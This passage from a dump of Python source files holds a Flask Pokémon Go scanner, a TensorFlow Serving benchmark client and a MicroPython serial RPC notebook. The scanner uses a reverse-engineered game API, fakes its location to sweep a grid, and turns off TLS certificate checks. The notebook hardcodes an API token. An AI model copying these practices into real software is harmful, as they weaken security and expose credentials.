'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print( '[!] Your given location: {}'.format(loc.address.encode('utf-8')))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError) as e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print( 'REQUEST:')
print( p_req)
print( 'Response:')
print( p_ret)
print( '''
''')
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print ('[!] Google login for: {}'.format(username))
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print ('[!] PTC login for: {}'.format(username))
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError as e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print ('[!] Trimming password to 15 characters')
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception as e:
if DEBUG:
print (r1.json()['errors'][0])
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print ('[+] RPC Session Token: {} ...'.format(access_token[:25]))
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print ('[+] Received API endpoint: {}'.format(api_endpoint))
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print ('[+] Login successful')
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print ('[+] Username: {}'.format(profile.profile.username))
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print ('[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S')))
for curr in profile.profile.currency:
print ('[+] {}: {}'.format(curr.type, curr.amount))
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print ('[!] Invalid Auth service specified')
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print ('[!] DEBUG mode on')
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId;
if hash not in seen.keys() or (seen[hash].TimeTillHiddenMs <= wild.TimeTillHiddenMs):
visible.append(wild)
seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print ("[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng']))
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
caffe_googlenet_client.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#!/usr/bin/env python2.7
"""Send JPEG image to tensorflow_model_server loaded with inception model.
"""
from __future__ import print_function
# This is a placeholder for a Google-internal import.
from grpc.beta import implementations
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
import time
import threading
import sys
tf.app.flags.DEFINE_string('server', 'localhost:9000',
'PredictionService host:port')
tf.app.flags.DEFINE_string('image', '', 'path to image in JPEG format')
FLAGS = tf.app.flags.FLAGS
import os.path as osp
import numpy as np
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# with open(FLAGS.image, 'rb') as f:
# # See prediction_service.proto for gRPC request/response details.
# data = f.read()
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['images'].CopyFrom(
# tf.contrib.util.make_tensor_proto(data, shape=[1, 224, 224, 3]))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# print(result.shape)
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# # with open(FLAGS.image, 'rb') as f:
# if True:
# # See prediction_service.proto for gRPC request/response details.
# # data = f.read()
# image_path = FLAGS.image
# is_jpeg = check_is_jpeg(image_path)
# spec = std_spec(batch_size=200, isotropic=False)
# img = load_image(image_path, is_jpeg, spec)
# processed_img = process_image(img=img,
# scale=spec.scale_size,
# isotropic=spec.isotropic,
# crop=spec.crop_size,
# mean=spec.mean)
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['images'].CopyFrom(
# processed_img.reshape(1, 224, 224, 3))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# print(result.shape)
def display_results(image_paths, probs):
'''Displays the classification results given the class probability for each image'''
# Get a list of ImageNet class labels
with open('/home/yitao/Documents/fun-project/caffe-tensorflow/examples/imagenet/imagenet-classes.txt', 'rb') as infile:
class_labels = map(str.strip, infile.readlines())
# Pick the class with the highest confidence for each image
class_indices = np.argmax(probs, axis=1)
# Display the results
print('\n{:20} {:30} {}'.format('Image', 'Classified As', 'Confidence'))
print('-' * 70)
for img_idx, image_path in enumerate(image_paths):
img_name = osp.basename(image_path)
class_name = class_labels[class_indices[img_idx]]
confidence = round(probs[img_idx, class_indices[img_idx]] * 100, 2)
print('{:20} {:30} {} %'.format(img_name, class_name, confidence))
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# # with open(FLAGS.image, 'rb') as f:
# if True:
# # See prediction_service.proto for gRPC request/response details.
# # data = f.read()
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['image_name'].CopyFrom(
# tf.contrib.util.make_tensor_proto(FLAGS.image))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# print(result.outputs["scores"].dtype)
# print(result.outputs["scores"].tensor_shape)
# tomList = []
# for float_val in result.outputs["scores"].float_val:
# tomList.append(float(float_val))
# tomArray = np.array(tomList, dtype=np.float32).reshape(1, 1000)
# # print(tomArray.shape)
# # print(tomArray.dtype)
# display_results([FLAGS.image], tomArray)
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# with open(FLAGS.image, 'rb') as f:
# # See prediction_service.proto for gRPC request/response details.
# data = f.read()
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['images'].CopyFrom(
# tf.contrib.util.make_tensor_proto(data, shape=[1]))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# # print(result)
# # print(result.outputs["scores"].dtype)
# print(result.outputs["scores"].tensor_shape)
# tomList = []
# for float_val in result.outputs["scores"].float_val:
# tomList.append(float(float_val))
# tomArray = np.array(tomList, dtype=np.float32).reshape(1, 1000)
# # print(tomArray.shape)
# # print(tomArray.dtype)
# display_results([FLAGS.image], tomArray)
def myFuncWarmUp(stub, i):
request = predict_pb2.PredictRequest()
request.model_spec.name = 'caffe_googlenet'
request.model_spec.signature_name = 'predict_images'
batchSize = 100
durationSum = 0.0
runNum = 13
for k in range(runNum):
image_data = []
start = time.time()
for j in range(batchSize):
image = "/home/yitao/Downloads/inception-input/%s/dog-%s.jpg" % (str(i % 100).zfill(3), str(j).zfill(3))
with open(image, 'rb') as f:
image_data.append(f.read())
request.inputs['images'].CopyFrom(
tf.contrib.util.make_tensor_proto(image_data, shape=[len(image_data)]))
result = stub.Predict(request, 60.0) # 10 secs timeout
# print(result)
end = time.time()
duration = (end - start)
print("it takes %s sec" % str(duration))
if (k != 0 and k != 3 and k != 8):
durationSum += duration
# sys.stdout.write('.')
# sys.stdout.flush()
print("[Warm up] on average, it takes %s sec to run a batch of %d images over %d runs" % (str(durationSum / (runNum - 3)), batchSize, (runNum - 3)))
def myFuncParallel(stub, i):
request = predict_pb2.PredictRequest()
request.model_spec.name = 'caffe_googlenet'
request.model_spec.signature_name = 'predict_images'
batchSize = 100
durationSum = 0.0
runNum = 10
for k in range(runNum):
image_data = []
start = time.time()
for j in range(batchSize):
image = "/home/yitao/Downloads/inception-input/%s/dog-%s.jpg" % (str(i % 100).zfill(3), str(j).zfill(3))
with open(image, 'rb') as f:
image_data.append(f.read())
request.inputs['images'].CopyFrom(
tf.contrib.util.make_tensor_proto(image_data, shape=[len(image_data)]))
result = stub.Predict(request, 60.0) # 10 secs timeout
# print(result)
end = time.time()
duration = (end - start)
print("[thread-%d] it takes %s sec" % (i, str(duration)))
# if (k != 0 and k != 3 and k != 8):
if True:
durationSum += duration
# sys.stdout.write('.')
# sys.stdout.flush()
print("[Parallel-thread-%d] on average, it takes %s sec to run a batch of %d images over %d runs" % (i, str(durationSum / runNum), batchSize, runNum))
def main(_):
# start = time.time()
host, port = FLAGS.server.split(':')
channel = implementations.insecure_channel(host, int(port))
stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# run Inception job
myFuncWarmUp(stub, 0)
num_tests = 0
tPool = []
for i in range(num_tests):
tPool.append(threading.Thread(target = myFuncParallel, args = (stub, i)))
start = time.time()
for i in range(num_tests):
t = tPool[i]
t.start()
# time.sleep(2.0)
for i in range(num_tests):
t = tPool[i]
t.join()
end = time.time()
print('\nFinished!')
print('[Parallel] The total running time to run %d concurrent jobs is %s' % (num_tests, str(end - start)))
if __name__ == '__main__':
tf.app.run()
|
MicroPython simple RPC - Host PC.py
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import asyncio
import functools as ft
import json
import platform
import threading
import asyncserial
async def wrap_background_loop(func, serial_loop, *args, **kwargs):
loop = asyncio.get_event_loop()
co_result = asyncio.Event()
def co_func():
async def _func(*args, **kwargs):
try:
co_result.result = await func(*args, **kwargs)
except Exception as exception:
co_result.result = exception
finally:
loop.call_soon_threadsafe(co_result.set)
serial_loop.create_task(_func(*args, **kwargs))
serial_loop.call_soon_threadsafe(co_func)
await co_result.wait()
if isinstance(co_result.result, Exception):
raise co_result.result
else:
return co_result.result
class BackgroundSerialAsync:
def __init__(self, *args, **kwargs):
loop_started = threading.Event()
def start():
if platform.system() == 'Windows':
# Need to use Proactor (IOCP) event loop for serial port.
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
self.device = asyncserial.AsyncSerial(*args, loop=loop, **kwargs)
self.loop = loop
loop.call_soon(loop_started.set)
loop.run_forever()
self.thread = threading.Thread(target=start)
self.thread.daemon = True
self.thread.start()
loop_started.wait()
def write(self, *args, **kwargs):
return wrap_background_loop(self.device.write, self.loop, *args, **kwargs)
def read_exactly(self, *args, **kwargs):
return wrap_background_loop(self.device.read_exactly, self.loop, *args, **kwargs)
def read(self, *args, **kwargs):
return wrap_background_loop(self.device.read, self.loop, *args, **kwargs)
async def readline(self):
data = b''
while True:
data += await self.read(1)
if data and data[-1] == ord(b'\n'):
return data
def close(self):
self.loop.call_soon_threadsafe(self.device.close)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# +
import sys
import serial
import json
class RemoteBase:
def __init__(self, device):
self.device = device
def _base_call(self, base_message, command, *args, **kwargs):
raise NotImplementedError
def call(self, command, *args, **kwargs):
return self._base_call({}, command, *args, **kwargs)
def await_(self, command, *args, **kwargs):
return self._base_call({'async': True}, command, *args, **kwargs)
def create_task(self, command, *args, **kwargs):
return self._base_call({'async': 'task'}, command, *args, **kwargs)
class Remote(RemoteBase):
def _base_call(self, base_message, command, *args, **kwargs):
message = base_message.copy()
message.update({'command': command, 'args': args,
'kwargs': kwargs})
self.device.write(json.dumps(message).encode('utf8') + b'\r\n')
response = json.loads(self.device.readline())
if 'error' in response:
raise RuntimeError('Error: `%s`' % response['error'])
return response['result']
class AsyncRemote(RemoteBase):
async def _base_call(self, base_message, command, *args, **kwargs):
message = base_message.copy()
message.update({'command': command, 'args': args,
'kwargs': kwargs})
await self.device.write(json.dumps(message).encode('utf8') + b'\r\n')
response = json.loads(await self.device.readline())
if 'error' in response:
raise RuntimeError('Error: `%s`' % response['error'])
return response['result']
# -
with BackgroundSerialAsync(port='COM18', baudrate=115200) as adevice:
aremote = AsyncRemote(adevice)
await aremote.call('gc.collect')
display(await aremote.call('gc.mem_free'))
with serial.Serial('COM18', baudrate=115200) as device:
remote = Remote(device)
remote.call('gc.collect')
display(remote.call('gc.mem_free'))
# +
API_TOKEN = 'c8005277d02736892f49d9e5402b73ded68fba9d'
with BackgroundSerialAsync(port='COM18', baudrate=115200) as adevice:
aremote = AsyncRemote(adevice)
# await aremote.call('ota.fetch_update', API_TOKEN, tag='v0.4')
# await aremote.call('ota.swap', '/ota-previous', '', '/ota-next')
# await aremote.call('open("/VERSION").read')
# print(await aremote.call('eval', 'dir(ota)'))
print(await aremote.call('ota.latest_version', API_TOKEN))
|
request_session.py
|
import socket
import json
import threading
import time
import select
import sys
import signal
import os
import argparse
s = None
t1 = None
def prGreen(skk): print("\033[92m {}\033[00m".format(skk))
def receive_data():
global s
global session_type
while True: # checking wheather first message is received
ready = select.select([s], [], [], 5)
